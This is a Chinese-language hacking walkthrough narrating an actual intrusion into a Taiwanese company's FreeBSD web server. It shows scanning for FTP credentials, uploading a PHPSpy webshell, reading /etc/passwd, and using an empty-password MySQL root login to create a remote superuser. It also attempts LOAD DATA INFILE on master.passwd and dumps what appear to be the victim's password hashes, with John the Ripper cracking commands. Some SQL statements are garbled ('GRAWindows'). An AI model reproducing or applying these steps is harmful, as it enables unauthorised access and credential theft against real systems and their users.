目前針對Windows+MSSQL或Windows+MYSQL的系統(tǒng)，在入侵方面的文章可算不少，大多通過腳本漏洞上傳WebShell，通過Serv-U提升權(quán)限，再通過PcAnyWhere或終端連接器遠(yuǎn)程連接。就系統(tǒng)而言，大陸用Windows的比較多，港臺和國外很多服務(wù)器都是用的Unix、Linux或FreeBSD系統(tǒng)。本文就是針對的FreeBSD+MYSQL+PHP系統(tǒng)，結(jié)合一個具體實例，講解了一下入侵思路。其實作者的運氣不錯，遇到了一個大意的管理員——有多少服務(wù)器管理員是這樣大意的呢？

圖片1

MYSQL：入侵FreeBSD的橋梁

面對一個PHP網(wǎng)站的時候，我的個人習(xí)慣是先看看有沒有PHP注入漏洞，然后再看是否存在整站漏洞，如Discuz!漏洞，PHPbb執(zhí)行命令漏洞等等。如果存在的話，可以利用它們上傳Webshell，如不存在的話在看看有沒有其它的系統(tǒng)漏洞。這次遇上的是臺灣某網(wǎng)絡(luò)工司的服務(wù)器，頁面很簡潔，注入漏洞、腳本漏洞都不存在，無奈之下拿出紅客聯(lián)盟的HScan v1.20，大概掃描一下看看。掃描結(jié)果圖所示。

圖片2

運氣真不錯，掃出一個FTP用戶名和密碼來，服務(wù)器還開了22（SSH），3306（MYSQL）兩個重要端口。FTP登錄，然后找一個可以上傳的WEB目錄上傳Phpspy.php，如圖3所示。

圖片3

在瀏覽器里輸入http://211.***.***.91/e***u/lib/phpspy.php，進入Phpspy.php的 “WebShell模式”鍵入命令：id //查看當(dāng)前用戶：

uid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)

鍵入命令：uname –a //查看系統(tǒng)：

FreeBSD www.e******u.com 4.3-STABLE FreeBSD 4.3-STABLE #0: Fri May 25 11:10:00 CST 2001     Root@www.e******u.com:/home/usr/src/sys/compile/GENERIC  i386

鍵入命令：cat /etc/passwd   //讀取密碼檔

# $FreeBSD: src/etc/master.passwd，v 1.25 1999/09/13 17:09:07 peter Exp $

#

Root:*:0:0:Charlie &:/Root:/bin/csh

games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin

news:*:8:8:News Subsystem:/:/sbin/nologin

nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

mysql:*:88:88:MySQL Daemon:/home/db/mysql:/sbin/nologin

www:*:2000:2000:WWW Administrator:/home/www/main:/bin/tcsh

chat:*:2001:2000:Chat Administrator:/home/www/chat:/bin/tcsh

game:*:2002:2000:Game Administrator:/home/www/game:/bin/tcsh

elife:*:2003:2000:eLife Administrator:/home/www/elife:/bin/tcsh

game-tnid:*:1005:0:game-tnid:/home/game-tnid:/bin/tcsh

cyc:*:1010:0:cyc:/home/cyc:/bin/tcsh

webadm:*:1012:1012:webadm:/home/webadm:/bin/tcsh

funker:*:1014:1014:funker:/home/funker:/bin/tcsh

小提示：FreeBSD的密碼加密后存放在/etc/master.passwd文件下，而不像Unix 一樣存放在/etc/shadow文件下，而且此文件只有Root用戶可以讀。

通過文件Globalvar.inc讀取數(shù)據(jù)庫信息如下：

$ethink4u_db = "web123"; // database info

$ethink4u_db_user = "Root";

$ethink4u_db_passwd = "";

$ethink4u_db_host = "localhost";

進入Phpspy.php的“SQL的查詢”頁面，連接數(shù)據(jù)庫，連接的數(shù)據(jù)名不是上面的“web123”而是“mysql”，連接成功后，輸入如下命令：

GRAWindows ALL PRIVILEGES ON *.* TO system@’%’IDEWindowsIFIED BY ’askyou’ WITH GRAWindows OPTION

一個遠(yuǎn)程的具有Root權(quán)限的用戶“system”，密碼為：“askyou”就建成了！這樣就可以通過牛族MYSQL連接器遠(yuǎn)程連接，整個數(shù)據(jù)庫的生殺大權(quán)就掌握在你的手中了！

連接后執(zhí)行如下命令來讀取/etc/master.passwd：

user mysql; //打開數(shù)據(jù)庫mysql

create table yongge(str TEXT); //創(chuàng)建表yongge

load data infile “//etc//master.passwd” into table yongge;把文件master.passwd讀到表中

seletc * from yongge into outfile “//tmp//passwd”;把表中內(nèi)容輸出到passwd文件中

drop table yongge; 刪除表

馬上查看/tmp/passwd文件的內(nèi)容，怎么是空的？估計我擁有這的個Root權(quán)限只是對數(shù)據(jù)有最大限權(quán)，可以任意操縱數(shù)據(jù)庫，而非系統(tǒng)的Root。

換一種思路吧！我們給它上傳一個PhpMyAdmin-2[1].6.0-pl3.zip，也可以利用Wget命令下載下一個：“Wget [options] [URL-list]”，然后利用 Unzip命令解壓（MS Windows下的壓縮軟件Winzip壓縮的文件可以用Unzip命令，該命令用于解擴展名為.zip的壓縮文件）。

小知識：Wget的參數(shù)較多，但大部分應(yīng)用只需要如下幾個常用的參數(shù)：

 -r 遞歸；對于HTTP主機，Wget首先下載URL指定的文件，然后（如果該文件是一個HTML文檔的話）遞歸下載該文件所引用（超級連接）的所有文件（遞歸深度由參數(shù)-l指定）。對FTP主機，該參數(shù)意味著要下載URL指定的目錄中的所有文件，遞歸方法與HTTP主機類似。

-N 時間戳：該參數(shù)指定Wget只下載更新的文件，也就是說，與本地目錄中的對應(yīng)文件的長度和最后修改日期一樣的文件將不被下載。

-m 鏡像：相當(dāng)于同時使用-r和-N參數(shù)。

-l  設(shè)置遞歸級數(shù)；默認(rèn)為5。-l1相當(dāng)于不遞歸；-l0為無窮遞歸；注意，當(dāng)遞歸深度增加時，文件數(shù)量將呈指數(shù)級增長。

-t  設(shè)置重試次數(shù)。當(dāng)連接中斷（或超時）時，Wget將試圖重新連接。如果指定-t0，則重試次數(shù)設(shè)為無窮多。

-c 指定斷點續(xù)傳功能。實際上，Wget默認(rèn)具有斷點續(xù)傳功能，只有當(dāng)你使用別的FTP工具下載了某一文件的一部分，并希望Wget接著完成此工作的時候，才需要指定此參數(shù)。

小知識：Unzip命令語法：unzip [選項] 壓縮文件名.zip。各選項的含義分別為：

-x 文件列表：解壓縮文件，但不包括指定的File文件。

-v 查看壓縮文件目錄，但不解壓。

-t 測試文件有無損壞，但不解壓。

-d 目錄：把壓縮文件解到指定目錄下。

-z 只顯示壓縮文件的注解。

-n 不覆蓋已經(jīng)存在的文件。

-o 覆蓋已存在的文件且不要求用戶確認(rèn)。

-j 不重建文檔的目錄結(jié)構(gòu)，把所有文件解壓到同一目錄下。

得到PhpMyAdmin后，再修改文件Config.inc.php的變量，修改成如下格式：

$cfg[’Servers’][$i][’user’]= ’Root’;  // MySQL user

$cfg[’Servers’][$i][’password’] = ’’;  // MySQL password在游覽器里輸入http://211.***.***.91/e***u/lib/phpMyAdmin-2.6.0-pl3/index.php就可以通過Phpmyadmin管理整個數(shù)據(jù)庫了！然后進入Phpspy的WebShell模式，輸入命令如下：

locate passwd
/etc/master.passwd

/etc/passwd

/home/game-tnid/game0131/adm/passwd

/home/game-tnid/gameDemoCopyFrom_game0131/adm/passwd

/home/usr/src/etc/master.passwd

/home/usr/src/release/picobsd/floppy.tree/etc/master.passwd

/home/usr/src/usr.bin/passwd

/home/www/chat/adm/passwd

/home/www/chat.old91/adm/passwd

/home/www/cycgame/idot.20030320/coop_adm/passwd

/home/www/game/game.0727/adm/passwd

/home/www/main/DBabcd/passwd

/home/www/main/ethink4u/hotnews/admin/passwd

/mirror/etc/master.passwd

/mirror/etc/passwd

/usr/bin/passwd查看它們內(nèi)容后整理密碼檔如下：

Root:$1$xOOaGnKU$U9QdsCI40XXcCUMBN.7Az.:0:0::0:0:Charlie &:/Root:/bin/sh

funker:Hk3kVaBMnSZ2s

chat:Ecu/FE6CVZKME

game-tnid:EfyN8aw51ADXw

game:h2J9eAOTG4INA

cyc:6z3daN06RdVeU

利用工具JOHN可以破解以上密碼檔。它的命令行方式：john [-功能選項] [密碼文件名]?，F(xiàn)在開始進行解密步驟：

先消滅FOOL USER，就是“笨蛋用戶”：john -single shadow.txt；

再消滅稍微聰明一點的用戶：john -wordfile:password.lst -rules shadow.txt；

最后進行大屠殺：john -i:all shadow.txt（當(dāng)然，第三步可能要你的電腦跑上10000年）。

因為服務(wù)器開了22端口，利用工具Eric’s Telnet 98 V8.4-SSH (http://www2.skycn.com/soft/1157.html)就可以遠(yuǎn)程登錄上去了。

小提示：22端口的SSH是Secure SHell的縮寫，它是一個用來替代Telnet、FTP以及R命令的工具包，主要是想解決口令在網(wǎng)上明文傳輸?shù)膯栴}。

整個過程中運氣真的很不錯，后來Funker，cyc這兩個用戶的密碼我利用一臺P4+256DDR的機器，跑了兩天也跑出來了，www的用戶名密碼和FTP相同（不知道是不是巧合）。通常的方法是找一個Exploit，然后利用GCC命令編譯后運行并提升權(quán)限，這里就不繼續(xù)討論了。

【編輯推薦】

1. 如何使用FreeBSD防火墻保護企業(yè)網(wǎng)絡(luò)
2. MySQL數(shù)據(jù)庫災(zāi)備的基礎(chǔ)知識大全
3. MySQL安全攻防實戰(zhàn)指南之體系結(jié)構(gòu)篇